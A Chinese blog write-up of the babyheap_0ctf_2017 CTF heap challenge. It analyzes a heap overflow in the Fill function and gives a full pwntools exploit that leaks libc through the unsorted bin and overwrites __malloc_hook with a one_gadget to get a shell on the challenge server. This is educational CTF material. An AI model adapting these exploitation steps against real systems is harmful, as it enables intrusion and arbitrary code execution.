babyheap_0ctf_2017 详细解析【BUUCTF】

最新推荐文章于 2024-07-17 09:26:09 发布
最新推荐文章于 2024-07-17 09:26:09 发布
阅读量3.1k 收藏 17
点赞数 6
分类专栏: CTF训练 Linux PWN 文章标签: 安全 linux PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/126677556
版权
CTF训练 同时被 3 个专栏收录
46 篇文章 15 订阅
订阅专栏
Linux
37 篇文章 0 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏

目录


在这里插入图片描述好家伙,保护全开,根据文件名,可以判断这是一道堆题目,刷了这么久,终于遇到堆题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。

main函数

在这里插入图片描述

sub_B70()

先看main函数里的 v4 = sub_B70();,进入函数,有个mmp函数,整个函数就是获取一块空间
在这里插入图片描述

mmp函数:将硬盘上的一块区域映射为虚拟内存
void *mmap(void addr, size_t length, int prot, int flags, int fd, off_t offset); 创建共享内存映射
参数:
addr: 指定映射区的首地址。通常传NULL,表示让系统自动分配
​ length:共享内存映射区的大小。(<= 文件的实际大小,通常为文件大小)
​ prot: 共享内存映射区的读写属性。PROT_READ(读)、PROT_WRITE(写)、PROT_READ|PROT_WRITE(读写)
​ flags: 标注共享内存的共享属性。
​ MAP_SHARED(共享,会将映射区所做的操作反映到物理设备(磁盘)上。)
​ MAP_PRIVATE(私有,映射区所做的修改不会反映到物理设备。 )
​ fd: 用于创建共享内存映射区的那个文件的 文件描述符。
​ offset:默认0,表示映射文件全部。偏移位置。需是 4k 的整数倍。
返回值:
​ 成功:映射区的首地址。
​ 失败:MAP_FAILED (void(-1)), errno

Allocate(v4);

在这里插入图片描述
该函数就是在申请一块size大小空间的内存,将内存信息写入,其结构图:
在这里插入图片描述

Fill(v4);存在漏洞!!

在这里插入图片描述
这里就出现一个问题,在Allocate中我们输入size申请一块size大小的堆空间。但Fill函数又让我们输入一边size,然后读size大小的数据到该区域指向的堆空间。这就很大问题了,若我们Fill是输入的size无限大,就完全可用把堆撑爆溢出,这就存在漏洞!!!

Free(v4);

在这里插入图片描述
比较简单,就是将该区使用位置0,并将申请空间释放,并且将指针指为0,即指针跟着释放

Dump(v4)

在这里插入图片描述
输出index索引的堆块内容,大小为size大小。

利用思路

这题由于free时,指针也会跟着置0,因此不存在UAF漏洞,则为Fill导致的栈溢出漏洞。
使用两次double free与fastbin attack。
可以通过unsorted bin的特性,若unsorted bin中只有一个chunk的时候,这个chunk的fd和bk指针存放的都是main_arena+88,通过main_arena我们就可以获取到libc的基地址。

获取libc的基址

libc的基址通过unsorted bin的特性获得,只要申请一块较大的chunk,并free掉,该chunk的fd和bk地址便可用来计算。因此我们要获得被free掉的chunk内容,而dump函数就算输出chunk内容。因此要使得两个指针指向同一个较大的chunk块,将其中一个指针chunk释放,另一个使用dump获取地址内存

先申请初始块

四个0x10、一个0x80
第0个块作用:方便修改第1、2块
第3个块作用:方便修改0x80的块

allo(0x10)#0
allo(0x10)#1
allo(0x10)#2
allo(0x10)#3
allo(0x80)#4
free(1)
free(2)

在这里插入图片描述在这里插入图片描述
两个free的chunk块均在fastbins中

填充2号位置,使其指向4号位置

通过fill溢出,使2号位置fd指针指向4号位置,并将4号位置的大小改成0x21,这样4号位置就好像被free掉了,并且加入fastbin链表中

payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x21)
payload += p8(0x80) # 使2的chunk空闲块指向了4号块的位置,4号位为较大的chunk,用来获取目标地址
fill(0,len(payload),payload)

payload = p64(0)*3 + p64(0x21)
fill(3,len(payload),payload) # 让4号块的大小变成0x21,这样4号块就意义上被free了

在这里插入图片描述在这里插入图片描述
可以看到fastbin中,二号位置已经指向了4号位置,并且4号位置大小被改为0x21

重新申请空间,将四号位置分配回来

在申请两块0x21大小的空间,注意,申请第一个时,index=1 为原来的2号chunk;申请第二个时,index=2,为原来的4号chunk;但我们最终想让4号chunk再次free掉,进入unsorted bin中,因此要将4号chunk大小改回0x91,这样也能让top chunk找到。
在这里插入图片描述

free(4)

这时候其实已经存在2个index指向一块chunk,一个是最开始申请的index=4,一个是后面再重新申请的index=2,
这时我们free(4),4号chunk 的fd和bk变成了main_arena+88地址,__malloc_hook = main_arena-0x10

free(4)    # 释放4号块
dump(2)
__malloc_hook = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\0')) - 88 - 0x10
libc_base = __malloc_hook - libc.symbols["__malloc_hook"]
print(hex(libc_base))

切割四号块

将四号块切割,使得一部分块放入fastbin中,这样才便于利用

allo(0x60)
free(4) # 相当于做一个切割,将0x80的块分成0x60在fastbin中,0x20在unsortedbin中
debug()

在这里插入图片描述

修改idx2内容,使其为malloc_hook附近构造chunk的地址

修改idx2内容,使其为malloc_hook附近构造chunk的地址,这块地址将来要创建一个虚假的chunk,要求是大小不能超过fastbin,并且包含malloc_hook,因为后面要将malloc_hook修改,使其指向其他函数,执行攻击。一般会将伪造的chunk的size为0x7f,正好在fastbin要求之内,也足够大,计算该地址为malloc_hook
在这里插入图片描述
计算可知要构造size位为:0x000000000000007f,其地址为malloc_hook-35:
在这里插入图片描述

payload = p64(__malloc_hook - 35)
fill(2,len(payload),payload)

在这里插入图片描述

申请假chunk,并将malloc_hook修改

allo(0x60)
allo(0x60) # 这个就会申请到假chunk

payload = b'a'*(0x8+0x2+0x8+1)
payload += p64(libc_base+0x4526a)
fill(6,len(payload),payload)

再次执行malloc

因为malloc_hook已经被修改到其他地址,我们再次执行malloc,则会执行我们的目标函数
one_gadget 找到目标函数:
在这里插入图片描述

payload = b'a'*(0x8+0x2+0x8+1)
payload += p64(libc_base+0x4526a)
fill(6,len(payload),payload)

allo(79)

完整代码:

from pwn import *
from LibcSearcher import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
p=remote("node4.buuoj.cn",29227)
libc = ELF("libc-2.23.so")
def debug():
    attach(p)
    pause()
def allo(size):
	p.recvuntil("Command: ")
	p.sendline(str(1))
	p.recvuntil("Size: ")
	p.sendline(str(size))

def fill(idx,size,content):
	p.recvuntil("Command: ")
	p.sendline(str(2))
	p.recvuntil("Index: ")
	p.sendline(str(idx))
	p.recvuntil("Size: ")
	p.sendline(str(size))
	p.recvuntil("Content: ")
	p.sendline(content)

def free(idx):
	p.recvuntil("Command: ")
	p.sendline(str(3))
	p.recvuntil("Index: ")
	p.sendline(str(idx))

def dump(idx):
	p.recvuntil("Command: ")
	p.sendline(str(4))
	p.recvuntil("Index: ")
	p.sendline(str(idx))

allo(0x10)#0
allo(0x10)#1
allo(0x10)#2
allo(0x10)#3
allo(0x80)#4
free(1)
free(2)

payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x21)
payload += p8(0x80) # 使2的chunk空闲块指向了4号块的位置,4号位为较大的chunk,用来获取目标地址
fill(0,len(payload),payload)

payload = p64(0)*3 + p64(0x21)
fill(3,len(payload),payload) # 让4号块的大小变成0x21,这样4号块就意义上被free了

allo(0x10)#1 The original position of 2 # 申请原本2号块
allo(0x10)#2 4 Simultaneous pointing	# 这里就会申请到4号块的位置

payload = p64(0)*3 + p64(0x91)
fill(3,len(payload),payload) # 将4号块的大小改回 0x91,不然找不到top chunk位置

allo(0x80) # 在申请一块大空间,避免4号块和top chunk合并

free(4)    # 释放4号块
dump(2)
__malloc_hook = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\0')) - 88 - 0x10
libc_base = __malloc_hook - libc.symbols["__malloc_hook"]
log.info("__malloc_hook: "+ hex(__malloc_hook))
log.info("libc_base: "+ hex(libc_base))

allo(0x60)
free(4) # 相当于做一个切割,将0x80的块分成0x60在fastbin中,0x20在unsortedbin中


payload = p64(__malloc_hook - 35)
fill(2,len(payload),payload)


allo(0x60)
allo(0x60) # 这个就会申请到假chunk

payload = b'a'*(0x8+0x2+0x8+1)
payload += p64(libc_base+0x4526a)
fill(6,len(payload),payload)

allo(79)

p.interactive()
Mokapeng
关注
  • 6
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PWN系列】 Buucf babyheap_0ctf_2017 Writeup
Vicl1fe的博客
11-27 667
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/luoleqi/p/12349714.html 分析 参考网址说的已经不错了,主要问题出现在fill功能,只要chunk存在,即可写任意长度的字符。 主要还是利用fasbin attack和unsorted的特性(下面会说到)来修改__malloc_hook拿到shell。 这里我来实际走一遍exp的流程,下面的exp我用的是本地的libc。 利用 下面的代码定
BUUCTF_PWN_test_your_nc详细题解
qq_46238551的博客
10-20 3087
test_your_nc_1 IDA PRO查看主函数 发现system("/bin/sh"),从主函数进入则执行getshell,所以直接nc或者写一个交互程序都可以getshell。 gdb动态分析,b main下主函数断点,r运行,看一下跳转到system函数后具体的执行过程 n单步执行,将程序调整到运行system函数之前 n单步执行,运行system(“/bin/sh”),观察getshell 本地gdb调试成功后,运行exp拿到flag exp.py ``..
buuctf babyheap_0ctf_2017
carol2358的博客
05-06 854
主体函数 我们可以在fill里发现可以任意输入字节 接下来我们就用chunk extend和off by one 图片来自 https://bbs.pediy.com/thread-246786.htm 具体看exp exp: from pwn import * #p=process('./babyheap_0ctf_2017') e=ELF('/lib/x86_64-linux-gn...
[BUUCTF]PWN——babyheap_0ctf_2017
最新发布
has_zaoganmaqule的博客
07-17 475
这题目我是在ctfshow里面看到的,因为ctfshow给的wp真的太抽象了。所以我就搜了搜,找到了原题,但我看别人写的都不是很好。所以后面自己尝试pwn成功了。首先查看保护全开是吧!!!放神的武器ida里面看看main函数一眼,菜单题cadd函数就很正常,调用calloc函数来申请堆块。(calloc函数和malloc函数的区别就是是否进行初始化,虽然calloc初始化看着更安全点,但是性能特别慢,而且在实际环境中好多变量都不需要进行初始化)
0ctf_2017_babyheap
u014377094的博客
03-10 469
本人double free+fastbin攻击第一道题,看了两天,好在理解下来不难。 参考传送门[分享]0ctf2017 - babyheap-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.com 惯例checksec一下 打开ida 1创建chunk,按1,2依次创建,2往里写,3free掉指定数字chunk,4print出指定chunk内容 不建议跟ida里一些函数死磕,硬读会恶心到,理解就ok。 这里先放exp,读一遍exp咱们再来解释 from pwn import
[BUUCTF] babyheap_0ctf_2017
红叶的博客
03-28 970
有点回想起当初第一次拿到flag时的感觉,继续加油。 本题考察知识点:**Fastbin Attack** 与 **Unsorted Bin Attack。** 通过使用Fastbin Attack与堆溢出漏洞,我们可以绕过Free后指针置零,从而达到在置零指针后获取堆块fd指针。 通过Unsorted Bin Attack,我们可以泄露Libc地址。 然后我们再使用Fastbin Attack替换__malloc_hook 本文写给自己,也写给跟我一样全网寻找详细解答的师傅们。
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
md5.zip_ctf的md5题_md5 ctf_md5 ctf_md5解密 ctf_解密
09-20
在CTF(Capture The Flag)竞赛中,MD5常常被用于创建挑战,参赛者需要通过逆向工程或查找已知的哈希碰撞来解密MD5值。 在"md5.zip"这个压缩包中,包含两个文件:"md5.py"和"code.txt"。"md5.py"很可能是一个Python...
welcome_CTF.exe
08-07
一道简单的ctf逆向题目,取自于成信大2019四叶草安全杯比赛
BUUCTF-babyheap_0ctf_2017
Rt1Text的博客
11-27 556
标准堆菜单。
BUUCTF(pwn) babyheap_0ctf_2017
半岛铁盒的博客
07-30 253
入门堆题 main菜单 add edit edit,我们写入数据的长度是我们可以自己控制的,我们可以利用这点溢出到另一个堆块上 free,普通的释放chunk的过程 show 利用过程:堆溢出,可以通过重叠堆来泄露libc 分为两步: 第一次先泄露 libc 地址, 第二次利用fastbin attack,修改malloc_hook为one_gadget from pwn import * context.log_level = 'debug' p=remote("node4.buuoj.c
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3934
本文主要列出0ctf_2017_babyheap详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
BUUCTF - PWNbabyheap_0ctf_2017
古月浪子的博客
04-05 2638
checksec一下,堆题果然是保护全开 IDA打开看看,首先mmap一块随机区域,用于存放我们申请的块的属性,然后输出菜单,有allocate、fill、free、dump功能 可以注意到,在创建堆的时候,将堆的地址和大小存放在了mmap的区域中,并且使用的是calloc,会将申请的内存区域清零 漏洞点在fill函数中,没有限制输入内容的长度,从而可以堆溢出 删除堆后会将指针置零 输出...
babyheap_0ctf_2017
m0sway的博客
11-25 559
babyheap_0ctf_2017 使用checksec查看: 保护全开,看到PIE的时候就想到需要泄露libc_base_addr了 拉进IDA中看吧: 一个死循环,主要功能Allocate、Fill、Free、Dump,这边我已经修改函数名了,接下来一个一个看 首先是创建堆: 最多创建15个chunk、每个chunk的最大size是4096 *(0x18LL * i + a1) = 1;创建chunk时给了标志1 接着是编辑堆内容: 判断了标志存不存在,若chunk存在,让用户输入size存放
0ctf Babyheap 2017
Bill
03-11 6428
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
BUUCTF 0ctf_2017_babyheap
m0_57754423的博客
02-15 217
简单说一下这个题目的思路: 1.泄露libc: 编辑chunk的时候存在堆溢出,可以通过堆溢出,修改两个不同的指针,指向同一个chunk,随后free掉其中一个,即可dump其中内存,main_arena的地址。 2.同样再次利用堆溢出,修改其中一个chunk的fd指针为__malloc_hook,然后修改malloc_hook为one_gadget。 这里解答一个疑惑,为什么不写got表? 1,首先 RELRO保护全开,是不可写的。 2,其次,bss段上很难找到数据通过size检查。 完整.
x_ctf_b0verfl0w
10-22
x_ctf_b0verfl0w是一道栈溢出的题目,需要利用栈溢出漏洞来实现攻击。攻击者需要构造一个ROP链,通过泄露puts函数的地址,计算出libc的基地址,然后再通过libc中的system函数和/bin/sh字符串的地址来执行系统命令。在这个过程中,还需要利用到一个jmp esp的gadget,用于跳转到栈上的shellcode执行。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值